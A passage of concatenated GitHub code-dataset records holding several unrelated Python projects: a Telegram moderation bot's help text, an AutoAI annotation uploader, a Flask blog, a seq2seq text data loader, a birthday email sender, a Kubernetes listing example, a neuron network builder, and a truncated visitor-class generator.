Ban a user.\n- /dban: Ban a user by reply, and delete their message.\n- /sban: Silently ban a user, and delete your message.\n- /tban: Temporarily ban a user. Example time values: 4m = 4 minutes, 3h = 3 hours, 6d = 6 days, 5w = 5 weeks.\n- /unban: Unban a user.\n\n- /mute: Mute a user.\n- /dmute: Mute a user by reply, and delete their message.\n- /smute: Silently mute a user, and delete your message.\n- /tmute: Temporarily mute a user. 
Example time values: 4m = 4 minutes, 3h = 3 hours, 6d = 6 days, 5w = 5 weeks.\n- /unmute: Unmute a user.\n\n- /kick: Kick a user.\n- /dkick: Kick a user by reply, and delete their message.\n- /skick: Silently kick a user, and delete your message\n\n**Examples:**\n- Mute a user for two hours.\n- `/tmute @username 2h`\n\"\"\"\n","repo_name":"VenujASB/MiyukiXBot","sub_path":"Miyuki/plugins/ban.py","file_name":"ban.py","file_ext":"py","file_size_in_byte":8843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"22991232923","text":"\"\"\"\nThis file contains the functions to send the data to AutoAI for annotation\n\"\"\"\n# importing libraries\nimport requests\nimport random\nimport shutil\nimport json\nimport random\nimport string\nimport math\nimport operator\nfrom functools import reduce\nimport datetime\nimport numpy as np\nimport threading\nimport os\n\n# importing user defined modules\n\nCLASSES_US = [\"green\", \"golden\", \"mech\"]\nAUTOAI_URL = \"http://10.10.10.10/backend/resource/\"\nDETECTION_MODEL_ID = \"64b536d86310da323b6b0266\"\nCLASSIFICATION_MODEL_ID = \"64b536e46310da80366b02be\"\nTAG_PREFIX = \"GoogleNext_\"\n\n\ndef transform_bbox_to_original(cropped_bbox, crop_start_x, crop_start_y):\n # Unpack the cropped bounding box coordinates\n cropped_x1, cropped_y1 = cropped_bbox\n\n # Calculate the coordinates of the bounding box in the original image\n original_x1 = cropped_x1 + crop_start_x\n original_y1 = cropped_y1 + crop_start_y\n\n # Return the transformed bounding box coordinates\n return original_x1, original_y1\n\n\n# Utility functions\ndef random_id(digit_count):\n return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(digit_count))\n\n\nhighContrastingColors = ['rgba(0,255,81,1)', 'rgba(255,219,0,1)', 'rgba(255,0,0,1)', 'rgba(0,4,255,1)',\n 'rgba(227,0,255,1)']\n\nannotation_id = {}\nfor index, object_class in enumerate(CLASSES_US):\n annotation_id[object_class] = index\nannotation_id[\"screw\"] = len(CLASSES_US)\n\n\n# Function to send to AutoAI\ndef send_to_autoai(status, csv, model, label, tag, confidence_score, prediction, model_type,\n filename, imageAnnotations, file_type=\"image/png\", prompt=None):\n try:\n payload = {'status': status,\n 'csv': csv,\n 'model': model,\n 'label': label,\n 'tag': TAG_PREFIX + tag,\n 'confidence_score': confidence_score,\n 'prediction': prediction,\n 'imageAnnotations': imageAnnotations,\n 'model_type': model_type}\n\n if prompt is not None:\n payload['prompt'] = prompt\n\n files = [('resource', (filename, open(filename, 'rb'), file_type))]\n headers = {}\n response = requests.request(\n 'POST', AUTOAI_URL, headers=headers, data=payload, files=files, verify=False)\n if response.status_code == 200:\n print('Successfully sent to AutoAI', end=\"\\r\")\n return True\n else:\n print('Error while sending to AutoAI')\n return False\n\n except Exception as e:\n print('Error while sending data to Auto AI : ', e)\n return False\n\n\n# Function to create annotation in AutoAI format\ndef json_creater(inputs, closed):\n data = []\n for index, input in enumerate(inputs):\n # JSON Object for the metadata and vertices\n json_id = random_id(8)\n color = highContrastingColors[index % 5]\n sub_json_data = {}\n sub_json_data[\"id\"] = json_id\n sub_json_data[\"name\"] = json_id\n sub_json_data[\"color\"] = color\n sub_json_data[\"isClosed\"] = closed\n sub_json_data[\"selectedOptions\"] = [{\"id\": \"0\", \"value\": \"root\"},\n {\"id\": annotation_id[inputs[input]], 
\"value\": inputs[input]}]\n\n points = eval(input)\n # points = np.fromstring(input, dtype=int)\n\n\n sorted_coords = points.copy()\n vertices = []\n is_first = True\n for vertex in sorted_coords:\n print(vertex)\n vertex_json = {}\n if is_first:\n vertex_json[\"id\"] = json_id\n vertex_json[\"name\"] = json_id\n is_first = False\n else:\n json_id = random_id(8)\n vertex_json[\"id\"] = json_id\n vertex_json[\"name\"] = json_id\n vertex_json[\"x\"] = vertex[0]\n vertex_json[\"y\"] = vertex[1]\n vertices.append(vertex_json)\n sub_json_data[\"vertices\"] = vertices\n data.append(sub_json_data)\n return json.dumps(data)\n\n\ndef send_to_autoai_image(status, csv, model, label, tag, confidence_score, prediction, model_type,\n filename, imageAnnotations, file_type, file_prefix):\n\n\n\n shutil.copy(filename, file_prefix + '_' + filename)\n filename = file_prefix + '_' + filename\n send_to_autoai(status, csv, model, label, tag, confidence_score, prediction, model_type,\n filename, imageAnnotations, file_type, None)\n os.remove(filename)\n\n\ndef send_to_autoai_annotation(status, csv, model, label, tag, confidence_score, prediction, model_type,\n filename, imageAnnotations, file_type, file_prefix,\n\n boxes, labels, cropping_rect):\n li = {}\n try:\n boxes = boxes.cpu().tolist()\n except:\n pass\n\n for labeld, box in zip(labels, boxes):\n # coord = box\n # xmin, ymin, xmax, ymax = round(coord[0]), round(coord[1]), round(coord[2]), round(coord[3])\n # li[f\"[[{xmin}, {ymin}], [{xmin}, {ymax}], [{xmax}, {ymax}], [{xmax}, {ymin}]]\"] = labeld\n\n coord = box\n coord = coord.tolist()\n temp = []\n for i in coord:\n # temp.append(i[0])\n\n corrected_coords = transform_bbox_to_original(i[0], cropping_rect[0], cropping_rect[1])\n temp.append(corrected_coords)\n\n coord = temp\n li[str(coord)] = labeld\n\n\n annotations = json_creater(li, True)\n send_to_autoai(status=status,\n csv=csv, # + \"
Annotations : %s\" % str(np.array(boxes, dtype=np.int)),\n model=model,\n label=label,\n tag=tag,\n confidence_score=confidence_score,\n prediction=prediction,\n model_type=model_type,\n filename=filename,\n imageAnnotations=annotations,\n file_type=file_type,\n prompt=None)\n # os.remove(filename)\n\n\n\ndef send_to_autoai_classes(status, csv, model, label, tag, confidence_score, prediction, model_type,\n filename, imageAnnotations, file_type,\n\n classes, boxes, scores, files_crop, object_ids):\n\n for predicted_label, box, score, _ in zip(classes, boxes, scores, files_crop):\n csv = csv + \"
%s : %s : %s\" % (predicted_label, box, round(np.max(score) * 100, 2))\n\n for predicted_label, _, score, file, object_id in zip(classes, boxes, scores, files_crop, object_ids):\n new_csv = csv + \"
Object ID : %s\" % object_id\n\n send_to_autoai(status=status,\n csv=new_csv,\n model=model,\n label=predicted_label,\n tag=tag,\n confidence_score=round(np.max(score) * 100, 2),\n prediction=prediction,\n model_type=model_type,\n filename=file,\n imageAnnotations=\"\",\n file_type=file_type,\n prompt=None)\n","repo_name":"siddhutalluri/send_to_vm","sub_path":"autoai_utils.py","file_name":"autoai_utils.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10039770617","text":"from flask import Flask, request, redirect, render_template, session, flash#can use bcrypt instead of hashlib\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://build-a-blog:abc123@localhost:8889/build-a-blog'\napp.config['SQLALCHEMY_ECHO'] = True\ndb = SQLAlchemy(app)\napp.secret_key = 'y337kGcys&zP3B'\n\nclass Blog(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120))\n body = db.Column(db.String(120))\n submitted = db.Column(db.Boolean)\n \n\n def __init__(self, title, body):\n self.title = title\n self.body = body\n self.submitted = False\n\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n\n if request.method == 'POST':\n blog_name_title = request.form['blog_title']\n blog_name_body = request.form['blog_body'] \n new_blog = Blog(blog_name_title, blog_name_body) \n db.session.add(new_blog)\n db.session.commit()\n\n blogs = Blog.query.filter_by(submitted=False).all()\n submitted_blogs = Blog.query.filter_by(submitted=True).all()\n return render_template('mainBlogPage.html',title=\"Build a Blog\", blogs=blogs, submitted_blogs=submitted_blogs)\n\n@app.route('/blog', methods=['POST', 'GET'])\ndef blog():\n\n if request.method == 'POST':\n blog_name_title = request.form['blog_title']\n blog_name_body = request.form['blog_body'] \n new_blog = Blog(blog_name_title, blog_name_body) \n db.session.add(new_blog)\n db.session.commit()\n\n blogs = Blog.query.filter_by(submitted=False).all()\n submitted_blogs = Blog.query.filter_by(submitted=True).all()\n return render_template('mainBlogPage.html',title=\"Build a Blog\", blogs=blogs, submitted_blogs=submitted_blogs)\n\n@app.route('/addBlogEntry', methods=['POST', 'GET'])\ndef addBlogEntry():\n \n title_error = ''\n blog_error = ''\n blog_title = ''\n blog_body = ''\n\n if request.method == 'POST':\n blog_name_title = request.form['blog_title']\n blog_name_body = request.form['blog_body']\n if len(blog_name_title) == 0:\n title_error = 'Please enter a title'\n\n if len(blog_name_body) == 0:\n blog_error = 'Please write your blog'\n\n if not title_error and not blog_error:\n new_blog = Blog(blog_name_title, blog_name_body)\n db.session.add(new_blog)\n db.session.commit()\n return redirect('/blog') \n\n return render_template('addBlogEntry.html', title_error=title_error, blog_error=blog_error)\n\n@app.route('/newpost', methods=['POST', 'GET'])\ndef newpost():\n\n if request.method == 'POST':\n blog_id = int(request.form['blog-id-title'])\n blog = Blog.query.get(blog_id)\n blog_body = int(request.form['blog-id-body'])\n blog = Blog.query.get(blog_body) \n db.session.add(blog)\n db.session.commit()\n\n return redirect('/blog')\n\n\n@app.route('/singleblog', methods=['GET'])\ndef singleBlog():\n\n if request.args.get('id'):\n blog_id = request.args.get('id')\n print(\"Your ID is: \" + blog_id) \n blog = Blog.query.get(blog_id)\n 
return render_template('singleblog.html', blog=blog)\n else:\n print('no record of this post')\n\n #blogs = Blog.query.filter_by(submitted=False).all() \n\n #blog_id_title = request.args.get('blog-id-title')\n #blog_id_body = request.args.get('blog-id-body') \n\n \n\nif __name__ == '__main__':\n app.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"jstep84/build-a-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11741044983","text":"# encoding: utf-8\n\n\"\"\"\n 数据处理单元\n 处理原始语料数据\n 生成批训练数据\n\"\"\"\n\n\nimport re\nimport os\nimport pickle\nimport json\nimport collections\nimport itertools\nimport random\nimport numpy as np\nfrom config import data_config\n\n\nclass Vocab(object):\n def __init__(self, path):\n self.path = path\n self.word2idx, self.idx2word = self.load_vocab()\n\n self.size = len(self.word2idx)\n\n def load_vocab(self):\n word2idx = {}\n idx2word = {}\n with open(self.path, encoding='utf-8') as fvcb:\n for line in fvcb:\n w, idx = line.strip().split()\n word2idx[w] = int(idx)\n idx2word[int(idx)] = w\n\n return word2idx, idx2word\n\n def encode(self, sent):\n if isinstance(sent, list):\n sent = ''.join(sent)\n sent = sent.replace(' ', '')\n idx = [self.word2idx.get(c, 1) for c in sent]\n # if len(idx) < seq_len:\n # idx.extend([0] * (seq_len - len(idx)))\n\n return idx\n\n def decode(self, idx):\n # res = [self.idx2word.get(i, '') for i in idx]\n\n res = []\n for index in idx:\n if index <= 3:\n continue\n res.append(self.idx2word.get(index, ''))\n return ''.join(res)\n\n\nclass DataLoader(object):\n def __init__(self, path, vocab, src_len, tgt_len):\n self.path = path\n self.vcb = Vocab(vocab)\n self.src_len = src_len\n self.tgt_len = tgt_len\n\n self.vocab_size = self.vcb.size\n self.pad = self.vcb.word2idx.get('')\n self.unk = self.vcb.word2idx.get('')\n self.start = self.vcb.word2idx.get('')\n self.end = self.vcb.word2idx.get('')\n\n self.data = self.load_data()\n\n def __len__(self):\n\n return len(self.data)\n\n def transform_sentence(self, sentence):\n\n return self.vcb.encode(sentence)\n\n def transform_indexs(self, indexs):\n\n return self.vcb.decode(indexs)\n\n def load_data(self, path=None):\n if path is None:\n path = self.path\n\n data = []\n with open(path, encoding='utf-8') as fdata:\n for line in fdata:\n assert len(line.strip().split()) == 3\n\n src_tgt = line.strip().split()\n src = self.transform_sentence(src_tgt[0])[:self.src_len]\n tgt = self.transform_sentence(src_tgt[-1])[:self.tgt_len - 1]\n\n dec = [self.start] + tgt\n tgt = tgt + [self.end]\n\n s_len = len(src)\n t_len = len(tgt)\n\n if s_len < self.src_len:\n src = src + [self.pad] * (self.src_len - s_len)\n if t_len < self.tgt_len:\n tgt = tgt + [self.pad] * (self.tgt_len - t_len)\n dec = dec + [self.pad] * (self.tgt_len - t_len)\n\n data.append([src, s_len, tgt, t_len, dec])\n\n return data\n\n def next_batch(self, batch_size):\n data_batch = random.sample(self.data, batch_size)\n batch = []\n for (src, s_len, tgt, t_len, dec) in data_batch:\n batch.append((src, s_len, tgt, t_len, dec))\n batch = zip(*batch)\n batch = [np.array(x) for x in batch]\n\n return batch\n\n def eval_batch(self, batch_size):\n batch = self.data[:batch_size]\n batch = zip(*batch)\n batch = [np.array(x) for x in batch]\n\n return batch\n\n def test_data(self, path):\n data = self.load_data(path)\n batch = []\n for (src, s_len, tgt, t_len, dec) 
in data:\n batch.append([np.array([src]),\n np.array([s_len]),\n np.array([tgt]),\n np.array([t_len]),\n np.array([dec])])\n\n return batch\n\n\nclass DataUnit(object):\n\n # 特殊标签\n PAD = ''\n UNK = ''\n START = ''\n END = ''\n\n # 特殊标签的索引\n START_INDEX = 0\n END_INDEX = 1\n UNK_INDEX = 2\n PAD_INDEX = 3\n\n def __init__(self, path, processed_path,\n min_q_len, max_q_len,\n min_a_len, max_a_len,\n word2index_path):\n \"\"\"\n 初始化函数,参数意义可查看CONFIG.py文件中的注释\n :param\n \"\"\"\n self.path = path\n self.processed_path = processed_path\n self.word2index_path = word2index_path\n self.min_q_len = min_q_len\n self.max_q_len = max_q_len\n self.min_a_len = min_a_len\n self.max_a_len = max_a_len\n self.vocab_size = 0\n self.index2word = {}\n self.word2index = {}\n self.data = self.load_data()\n self._fit_data_()\n\n def next_batch(self, batch_size):\n \"\"\"\n 生成一批训练数据\n :param batch_size: 每一批数据的样本数\n :return: 经过了填充处理的QA对\n \"\"\"\n data_batch = random.sample(self.data, batch_size)\n batch = []\n for qa in data_batch:\n encoded_q = self.transform_sentence(qa[0])[:self.max_q_len]\n encoded_a = self.transform_sentence(qa[1])[:self.max_a_len]\n q_len = len(encoded_q)\n\n # 填充句子\n encoded_q = encoded_q + \\\n [self.func_word2index(self.PAD)] * (self.max_q_len - q_len)\n encoded_a = encoded_a + [self.func_word2index(self.END)]\n encoded_a = encoded_a[:self.max_a_len]\n a_len = len(encoded_a)\n encoded_a = encoded_a + \\\n [self.func_word2index(self.PAD)] * (self.max_a_len - a_len)\n\n batch.append((encoded_q, q_len, encoded_a, a_len))\n batch = zip(*batch)\n batch = [np.asarray(x) for x in batch]\n return batch\n\n def transform_sentence(self, sentence):\n \"\"\"\n 将句子转化为索引\n :param sentence:\n :return:\n \"\"\"\n res = []\n for word in sentence:\n res.append(self.func_word2index(word))\n return res\n\n def transform_indexs(self, indexs):\n \"\"\"\n 将索引转化为句子,同时去除填充的标签\n :param indexs:索引序列\n :return:\n \"\"\"\n res = []\n for index in indexs:\n if (index == self.START_INDEX or index == self.PAD_INDEX\n or index == self.END_INDEX or index == self.UNK_INDEX):\n continue\n res.append(self.func_index2word(index))\n return ''.join(res)\n\n def _fit_data_(self):\n \"\"\"\n 得到处���后语料库的所有词,并将其编码为索引值\n :return:\n \"\"\"\n if not os.path.exists(self.word2index_path):\n vocabularies = [x[0] + x[1] for x in self.data]\n self._fit_word_(itertools.chain(*vocabularies))\n with open(self.word2index_path, 'wb') as fw:\n pickle.dump(self.word2index, fw)\n else:\n with open(self.word2index_path, 'rb') as fr:\n self.word2index = pickle.load(fr)\n self.index2word = dict([(v, k)\n for k, v in self.word2index.items()])\n self.vocab_size = len(self.word2index)\n\n def load_data(self):\n \"\"\"\n 获取处理后的语料库\n :return:\n \"\"\"\n if not os.path.exists(self.processed_path):\n data = self._extract_txt()\n with open(self.processed_path, 'wb') as fw:\n pickle.dump(data, fw)\n else:\n with open(self.processed_path, 'rb') as fr:\n data = pickle.load(fr)\n # 根据CONFIG文件中配置的最大值和最小值问答对长度来进行数据过滤\n data = [\n x for x in data if self.min_q_len <= len(\n x[0]) <= self.max_a_len and self.min_a_len <= len(\n x[1]) <= self.max_a_len]\n return data\n\n def func_word2index(self, word):\n \"\"\"\n 将词转化为索引\n :param word:\n :return:\n \"\"\"\n return self.word2index.get(word, self.word2index[self.UNK])\n\n def func_index2word(self, index):\n \"\"\"\n 将索引转化为词\n :param index:\n :return:\n \"\"\"\n return self.index2word.get(index, self.UNK)\n\n def _fit_word_(self, vocabularies):\n \"\"\"\n 将词表中所有的词转化为索引,过滤掉出现次数少于4次的词\n :param vocabularies:词表\n :return:\n 
\"\"\"\n vocab_counter = collections.Counter(vocabularies)\n index2word = ([self.START] + [self.END] + [self.UNK] + [self.PAD] +\n [x[0] for x in vocab_counter if vocab_counter.get(x[0]) > 4])\n self.word2index = dict([(w, i) for i, w in enumerate(index2word)])\n self.index2word = dict([(i, w) for i, w in enumerate(index2word)])\n\n def _regular_(self, sen):\n \"\"\"\n 句子规范化,主要是对原始语料的句子进行一些标点符号的统一\n :param sen:\n :return:\n \"\"\"\n sen = sen.replace('/', '')\n sen = re.sub(r'…{1,100}', '…', sen)\n sen = re.sub(r'\\.{3,100}', '…', sen)\n sen = re.sub(r'···{2,100}', '…', sen)\n sen = re.sub(r',{1,100}', ',', sen)\n sen = re.sub(r'\\.{1,100}', '。', sen)\n sen = re.sub(r'。{1,100}', '。', sen)\n sen = re.sub(r'\\?{1,100}', '?', sen)\n sen = re.sub(r'?{1,100}', '?', sen)\n sen = re.sub(r'!{1,100}', '!', sen)\n sen = re.sub(r'!{1,100}', '!', sen)\n sen = re.sub(r'~{1,100}', '~', sen)\n sen = re.sub(r'~{1,100}', '~', sen)\n sen = re.sub(r'[“”]{1,100}', '\"', sen)\n sen = re.sub(r'[^\\w\\u4e00-\\u9fff\"。,?!~·]+', '', sen)\n sen = re.sub(r'[ˇˊˋˍεπのゞェーω]', '', sen)\n\n return sen\n\n def _good_line_(self, line):\n \"\"\"\n 判断一句话是否是好的语料,即判断\n :param line:\n :return:\n \"\"\"\n if len(line) == 0:\n return False\n ch_count = 0\n for c in line:\n # 中文字符范围\n if '\\u4e00' <= c <= '\\u9fff':\n ch_count += 1\n if ch_count / float(len(line)) >= 0.5 and len(re.findall(r'[a-zA-Z0-9]', ''.join(line))) < 3 and len(\n re.findall(r'[ˇˊˋˍεπのゞェーω]', ''.join(line))) < 3 and line.find(\"鸡\") == -1:\n return True\n return False\n\n def _extract_data(self):\n res = []\n q = None\n with open(self.path, 'r', encoding='utf-8') as fr:\n for line in fr:\n if line.startswith('M '):\n if q is None:\n q = self._regular_(line[2:-1])\n else:\n a = self._regular_(line[2:-1])\n if self._good_line_(q) and self._good_line_(a):\n res.append((q, a))\n q = None\n return res\n\n def _extract_txt(self):\n res = []\n q = None\n with open(self.path, 'r', encoding='utf-8') as fr:\n for line in fr:\n qa = line.split('\\t')\n if len(qa) < 2:\n continue\n q = self._regular_(qa[0])\n a = self._regular_(qa[1])\n if self._good_line_(q) and self._good_line_(a):\n res.append((q, a))\n return res\n\n def __len__(self):\n \"\"\"\n 返回处理后的语料库中问答对的数量\n :return:\n \"\"\"\n return len(self.data)\n\n def normalize_txt(self):\n # normalize original txt data\n if not os.path.exists(self.processed_path):\n data = self._extract_txt()\n with open(self.processed_path, 'wb') as fw:\n pickle.dump(data, fw)\n # normalize vocabulary\n if not os.path.exists(self.word2index_path):\n vocabularies = [x[0] + x[1] for x in data]\n self._fit_word_(itertools.chain(*vocabularies))\n with open(self.word2index_path, 'wb') as fw:\n pickle.dump(self.word2index, fw)\n\n\nif __name__ == '__main__':\n data_unit = DataUnit(\n path=data_config['path'], processed_path=data_config['processed_path'],\n min_q_len=data_config['min_q_len'], max_q_len=data_config['max_q_len'],\n min_a_len=data_config['min_a_len'], max_a_len=data_config['max_a_len'],\n word2index_path=data_config['word2index_path'])\n data_unit.normalize_txt()\n","repo_name":"kpsc/nlp","sub_path":"SEQ2SEQ/base-v1/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":12597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4789097815","text":"\"\"\"\nA script that sends a randomly chosen, customized birthday message to contacts listed in birthdays.csv\n\"\"\"\nimport smtplib\nimport datetime as dt\nimport config # Import secret login information, stored 
separately to keep it out of git/github\nimport random\nimport pandas as pd\n\n\ndef send_email(to_address, subject, message):\n \"\"\"\n Sends an email message with gmail using the account info provided in config.py\n\n :param to_address: email address of the recipient\n :param subject: subject of email\n :param message: message to send\n :return: None\n \"\"\"\n\n with smtplib.SMTP(\"smtp.gmail.com\", port=587) as connection:\n connection.starttls()\n connection.login(user=config.my_email, password=config.password)\n connection.sendmail(\n from_addr=config.my_email,\n to_addrs=to_address,\n msg=f\"Subject: {subject}\\n\\n{message}\"\n )\n\n\n# Get the current date\nnow = dt.datetime.now()\n\nbirthdays_df = pd.read_csv(\"birthdays.csv\") # Read in birthdays from birthdays.csv file\n\n# Create a new dataframe containing birthdays that match today's month and day\ntodays_birthdays_df = birthdays_df[(birthdays_df.month == now.month) & (birthdays_df.day == now.day)]\n\n# Iterate through the dataframe of matching birthdays then customize and send a randomly chosen message for each\nfor index, row in todays_birthdays_df.iterrows():\n with open(f\"letter_templates/letter_{random.choice([1, 2, 3])}.txt\") as letter_file:\n custom_message = letter_file.read()\n\n custom_message = custom_message.replace(\"[NAME]\", row['name'])\n custom_message = custom_message.replace(\"[FROM]\", config.my_name)\n print(f\"Sending message to {row['name']} - {row['email']}\")\n send_email(to_address=row['email'], subject='Happy Birthday', message=custom_message)\n","repo_name":"jasonwashburn/BirthdayWisher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17528889396","text":"import cluster_mode_backend as cmb\nimport k8s_config\n\n# check what clusters we can access\nk8s_config.update_available_clusters()\nclusters = k8s_config.all_cluster_names()\n\n# list deployment names for each namespace in each cluster\nfor cluster in clusters:\n\tprint(\"Cluster\", cluster + \":\")\n\tnamespaces = cmb.cluster_namespaces(cluster)\n\tfor ns in namespaces:\n\t\tprint(\"\\tNamespace\", ns.metadata.name + \":\")\n\t\tdeploys = cmb.namespace_deployments(ns.metadata.name, cluster)\n\t\tfor deploy in deploys:\n\t\t\tprint(\"\\t\\tDeployment:\", deploy.metadata.name)\n\n# getting cluster objects from mcm\nprint(cmb.mcm_clusters(clusters))\n","repo_name":"IBM/multicloud-incident-response-navigator","sub_path":"backend/cluster_mode_backend_example.py","file_name":"cluster_mode_backend_example.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"74864156413","text":"import os\nimport json\nimport h5py\nimport numpy as np\n\n\nfrom allensdk.api.queries.cell_types_api import CellTypesApi\n\nfrom bmtk.builder import NetworkBuilder\nfrom bmtk.builder.bionet import SWCReader\nfrom bmtk.builder.auxi.node_params import positions_columinar, xiter_random\n\nimport urllib.request\nimport yaml\nfrom yaml.loader import Loader\nimport pandas as pd\nimport numpy as np\n\n# models to use from DataFrame\nflag = 'AA' # 'TEST', 'AA', 'PS', or 'ALL'\nnum_models = 2 # if 'TEST' specify number of all-active models\n\nnp.random.seed(0)\n\nwith open('model_data/models.yaml') as f:\n models = yaml.load(f, Loader=Loader)\n\nwith open('model_data/specimens.yaml') as f:\n specimens = yaml.load(f, 
Loader=Loader)\n\nboth_df = pd.read_pickle('both_models_df')\nboth_AA_ids = list(both_df['all-active model id'].values)\nboth_PS_ids = list(both_df['perisomatic model id'].values)\n\nmorphology_files = {}\n\naa_cell_models = []\nps_cell_models = []\n\ncell_types_api = CellTypesApi()\n\nif flag in 'TEST':\n test_rows = both_df.iloc[:num_models, :]\n models_df = test_rows\nelse:\n models_df = both_df\n\nfor row in models_df.iterrows():\n row_items = row[1]\n specimen_id = row_items['specimen id']\n all_active_id = row_items['all-active model id']\n perisomatic_id = row_items['perisomatic model id']\n\n specimen = specimens[specimen_id]\n aa_model = specimen['all-active']\n ps_model = specimen['perisomatic']\n\n morphology_file = f\"{aa_model['cre_lines']}_{aa_model['neuron_reconstruction_id']}_m\"\n\n if not os.path.exists(f\"morphologies/{morphology_file}.swc\"):\n cell_types_api.save_reconstruction(int(specimen_id), f\"morphologies/{morphology_file}.swc\")\n\n if flag in ('TEST', 'AA', 'ALL'):\n aa_model_name = f\"{aa_model['id']}_all-active\"\n aa_model_template = f\"nml:Cell_{aa_model['id']}.cell.nml\"\n aa_cell_model = {'model_name': aa_model_name,\n 'ei': 'i',\n 'morphology': morphology_file,\n 'model_template': aa_model_template}\n aa_cell_models.append(aa_cell_model)\n\n if flag in ('PS', 'ALL'):\n ps_model_name = f\"{ps_model['id']}_perisomatic\"\n ps_model_template = f\"nml:Cell_{ps_model['id']}.cell.nml\"\n ps_cell_model = {'model_name': ps_model_name,\n 'ei': 'i',\n 'morphology': morphology_file,\n 'model_template': ps_model_template}\n ps_cell_models.append(ps_cell_model)\n\ncell_models = aa_cell_models + ps_cell_models\n\nmorphologies = {p['model_name']: SWCReader(f\"morphologies/{p['morphology']}.swc\") for p in cell_models}\n\nwith open(\"circuit_config.json\", \"r\") as jsonFile:\n cir_cfg_data = json.load(jsonFile)\n\nif flag in 'TEST':\n single_cells = NetworkBuilder(f'single_cells_{num_models}')\n cir_cfg_data['networks']['nodes'] = [{'nodes_file': f'$NETWORK_DIR/single_cells_{num_models}_nodes.h5',\n 'node_types_file': f'$NETWORK_DIR/single_cells_{num_models}_node_types.csv'}]\n print('BUILT TEST NETWORK!')\nelif flag in 'AA':\n single_cells = NetworkBuilder('single_cells_aa')\n cir_cfg_data['networks']['nodes'] = [{'nodes_file': '$NETWORK_DIR/single_cells_aa_nodes.h5',\n 'node_types_file': '$NETWORK_DIR/single_cells_aa_node_types.csv'}]\n print('BUILT ALL-ACTIVE NETWORK!')\nelif flag in 'PS':\n single_cells = NetworkBuilder('single_cells_ps')\n cir_cfg_data['networks']['nodes'] = [{'nodes_file': '$NETWORK_DIR/single_cells_ps_nodes.h5',\n 'node_types_file': '$NETWORK_DIR/single_cells_ps_node_types.csv'}]\n print('BUILT PERISOMATIC NETWORK!')\nelse:\n single_cells = NetworkBuilder('single_cells_all')\n cir_cfg_data['networks']['nodes'] = [{'nodes_file': '$NETWORK_DIR/single_cells_all_nodes.h5',\n 'node_types_file': '$NETWORK_DIR/single_cells_all_node_types.csv'}]\n print('BUILT ALL NETWORK!')\n\nwith open(\"circuit_config.json\", \"w\") as jsonFile:\n json.dump(cir_cfg_data, jsonFile, indent=4)\n\nfor i, model_props in enumerate(cell_models):\n n_cells = 1\n\n positions = positions_columinar(N=n_cells, center=[0, 10.0, 0], max_radius=50.0, height=200.0)\n\n single_cells.add_nodes(N=n_cells,\n x=positions[:, 0], y=positions[:, 1], z=positions[:, 2],\n rotation_angle_yaxis=xiter_random(N=n_cells, min_x=0.0, max_x=2*np.pi),\n model_type='biophysical',\n model_processing='aibs_perisomatic',\n 
**model_props)\n\nsingle_cells.build()\nsingle_cells.save(output_dir='network')\n","repo_name":"kedoxey/AIBS_single_cell_network","sub_path":"build_network.py","file_name":"build_network.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14956859344","text":"def write_visitor_info(write_file, all_expr_class_infos):\n write_file.write(\"class {0}:\\n\".format(base_visitor_class_name))\n write_file.write(\"{0}def accept(self, obj):\\n\".format(indent))\n write_file.write(\"{0}visitor_class_name = obj.__class__.__name__.lower()\\n\".format(indent*2))\n write_file.write(\"{0}method_name = 'visit_' + visitor_class_name\\n\".format(indent*2))\n write_file.write(\"{0}func_to_call = getattr(self, method_name)\\n\".format(indent*2))\n write_file.write(\"{0}return func_to_call(obj)\\n\".format(indent*2))\n write_file.write('\\n')\n\n write_file.write(\"# Implementation for these visitor classes / functions defined elsewhere\\n\")\n for visitor_type in visitor_types:\n write_file.write(\"class {0}:\\n\".format(visitor_type))\n for expr_class_name, field_arr in all_expr_class_infos.items():\n write_file.write(\"{0}def visit_{1}(self, {2}_obj):\\n\".format(\n indent, expr_class_name.lower(), expr_class_name.lower()))\n write_file.write(\"{0}pass\\n\".format(indent*2))\n write_file.write('\\n')\n\n\ndef write_header_info(write_file, all_expr_class_infos, base_class_name):\n write_file.write(\"# {0} Types:\\n\".format(base_class_name))\n write_file.write(\"# {0}{1}\\n\".format(indent, ', '.join(all_expr_class_infos.keys())))\n write_file.write(\"# \\n\")\n write_file.write(\"# Visitors (accepts) avaliable on types:\\n\")\n write_file.write(\"# {0}{1}\\n\\n\".format(indent, ', '.join(visitor_types)))\n\n\ndef write_base_class(write_file, base_class_name):\n write_file.write(\"class {0}:\\n\".format(base_class_name))\n write_file.write(\"{0}def accept(self, visitor_obj):\\n\".format(indent))\n write_file.write(\"{0}visitor_obj.visit(self)\\n\".format(indent*2))\n write_file.write('\\n')\n\n\ndef read_line_from_grammar(write_file, line):\n colon_split = line.split(':')\n if len(colon_split) != 2:\n if line.rstrip().lstrip() != '':\n print('Could not parse line in grammar', line)\n return None\n\n class_name = colon_split[0].replace(' ', '')\n read_obj = {class_name: []}\n\n # reading fields\n fields = colon_split[1].split(',')\n for field in fields:\n var_type, var_name = field.lstrip().rstrip().split(' ')\n 